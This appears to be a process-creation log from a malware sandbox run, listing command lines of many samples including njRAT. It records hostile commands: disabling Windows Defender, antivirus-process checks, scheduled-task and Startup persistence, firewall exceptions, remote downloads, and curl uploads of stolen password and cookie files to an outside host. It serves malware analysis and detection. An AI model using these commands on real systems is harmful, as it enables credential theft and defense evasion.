"C:\Users\Admin\Desktop\New Text Document mod.exse\a\fcxcx.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Update.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Update.exe"

C:\Windows\system32\svchost.exe

"C:\Windows\system32\svchost.exe"

C:\Windows\system32\msiexec.exe

"C:\Windows\system32\msiexec.exe"

C:\Windows\system32\audiodg.exe

"C:\Windows\system32\audiodg.exe"

C:\Users\Admin\AppData\Local\Temp\6538.tmp.ssg.exe

"C:\Users\Admin\AppData\Local\Temp\6538.tmp.ssg.exe"

C:\Users\Admin\AppData\Local\Temp\78F1.tmp.zx.exe

"C:\Users\Admin\AppData\Local\Temp\78F1.tmp.zx.exe"

C:\Users\Admin\AppData\Local\Temp\78F1.tmp.zx.exe

"C:\Users\Admin\AppData\Local\Temp\78F1.tmp.zx.exe"

C:\Users\Admin\AppData\Local\MethodSignature\tzemsotp\Product.exe

C:\Users\Admin\AppData\Local\MethodSignature\tzemsotp\Product.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Documents\OUCH_SOKHENG.pdf"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=18CFB69F07F724E709E4166368633D9D --mojo-platform-channel-handle=1764 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=410FBA09A22902ABE057E6D4DEBDFF5C --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=410FBA09A22902ABE057E6D4DEBDFF5C --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E3300027980912A10EC44DF1828698C5 --mojo-platform-channel-handle=2332 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A897585BE282A36C03503C698E57DE96 --mojo-platform-channel-handle=1960 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=2478C43556F96753CFBF5CAEEA5B95BB --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=2478C43556F96753CFBF5CAEEA5B95BB --renderer-client-id=6 --mojo-platform-channel-handle=2552 --allow-no-sandbox-job /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4280B938C92B6465C2A2438DE9230C00 --mojo-platform-channel-handle=2832 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAUAByAG8AZAB1AGMAdAAuAGUAeABlADsA

C:\Users\Admin\Desktop\4363463463464363463463463\Files\g9win6bb.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\g9win6bb.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Dragon Dragon.bat & Dragon.bat

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\c1.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\c1.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Documents\OUCH_SOKHENG.pdf"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0x11c,0x12c,0x7ff802cd46f8,0x7ff802cd4708,0x7ff802cd4718

C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\njrat.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\njrat.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 609587

C:\Windows\SysWOW64\findstr.exe

findstr /V "outputdiffswalnutcontainer" Sufficient

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,1795154957606306922,16036559703329824725,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,1795154957606306922,16036559703329824725,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2432 /prefetch:3

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Combine + ..\Transportation + ..\Chef k

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,1795154957606306922,16036559703329824725,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\609587\Horizon.pif

Horizon.pif k

C:\Windows\SysWOW64\choice.exe

choice /d y /t 5

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1795154957606306922,16036559703329824725,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1795154957606306922,16036559703329824725,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3692 /prefetch:1

C:\Users\Admin\Desktop\New Text Document mod.exse\a\main.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\main.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\tmp.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\tmp.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c schtasks.exe /create /tn "Windows" /tr "wscript //B 'C:\Users\Admin\AppData\Local\Sync360 Sphere Elite Technologies Co\Sync360Sphere.js'" /sc minute /mo 5 /F

C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\main.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\main.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sync360Sphere.url" & echo URL="C:\Users\Admin\AppData\Local\Sync360 Sphere Elite Technologies Co\Sync360Sphere.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sync360Sphere.url" & exit

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "Windows" /tr "wscript //B 'C:\Users\Admin\AppData\Local\Sync360 Sphere Elite Technologies Co\Sync360Sphere.js'" /sc minute /mo 5 /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c mode con: cols=125 lines=35

C:\Windows\system32\mode.com

mode con: cols=125 lines=35

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1795154957606306922,16036559703329824725,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4044 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1795154957606306922,16036559703329824725,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4316 /prefetch:1

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get UUID

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Windows\rundll32.exe

"C:\Windows\rundll32.exe"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\client.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\client.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_6700_133786559434265760\client.exe

C:\Users\Admin\Desktop\4363463463464363463463463\Files\client.exe

C:\Users\Admin\Desktop\4363463463464363463463463\Files\4434.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\4434.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\DivineDialogue.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\DivineDialogue.exe"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\dayum.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\dayum.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c move Prerequisite Prerequisite.bat & Prerequisite.bat

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Windows\rundll32.exe" "rundll32.exe" ENABLE

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 115839

C:\Windows\SysWOW64\findstr.exe

findstr /V "ISTTRANSACTIONSCONFCOMMENTARY" Grew

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Butter + ..\Community + ..\Efficiently + ..\Tyler + ..\Seas + ..\California + ..\Skip + ..\Publisher + ..\Disappointed + ..\We + ..\Ll + ..\Time + ..\Terrible + ..\Anal + ..\Fleece + ..\Always + ..\Tcp l

C:\Users\Admin\AppData\Local\Temp\115839\Leaving.pif

Leaving.pif l

C:\Windows\SysWOW64\choice.exe

choice /d y /t 5

C:\Windows\SYSTEM32\cmd.exe

cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SafeHarbor.url" & echo URL="C:\Users\Admin\AppData\Local\SecureCloud Harbor Inc\SafeHarbor.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SafeHarbor.url" & exit

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\2020.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\2020.exe"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\2020.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\2020.exe"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\freedom.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\freedom.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Users\Admin\Desktop\New Text Document mod.exse\a\shost.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\shost.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\shost.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\shost.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\qhos.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\qhos.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\qhos.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\qhos.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"

C:\Windows\system32\taskkill.exe

taskkill /im firefox.exe /t /f

C:\Users\Admin\Desktop\New Text Document mod.exse\a\phost.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\phost.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\phost.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\phost.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\in.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\in.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\48D2.tmp\48D3.tmp\48D4.bat "C:\Users\Admin\Desktop\New Text Document mod.exse\a\in.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\New Text Document mod.exse\a\phost.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\New Text Document mod.exse\a\phost.exe'

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/arht/releases/download/seht/archive.htm/' -outfile archive.htm"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\NEOFreeSetup.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\NEOFreeSetup.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /I "C:\Program Files (x86)\Common Files\Wise Installation Wizard\WIS0E7C0CA4E536483D943BE977EA796DD9_1_0_0_182.MSI" WISE_SETUP_EXE_PATH="C:\Users\Admin\Desktop\New Text Document mod.exse\a\NEOFreeSetup.exe"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 6C3ADD092494D81E5030525BA0D8D59B C

C:\Windows\system32\reg.exe

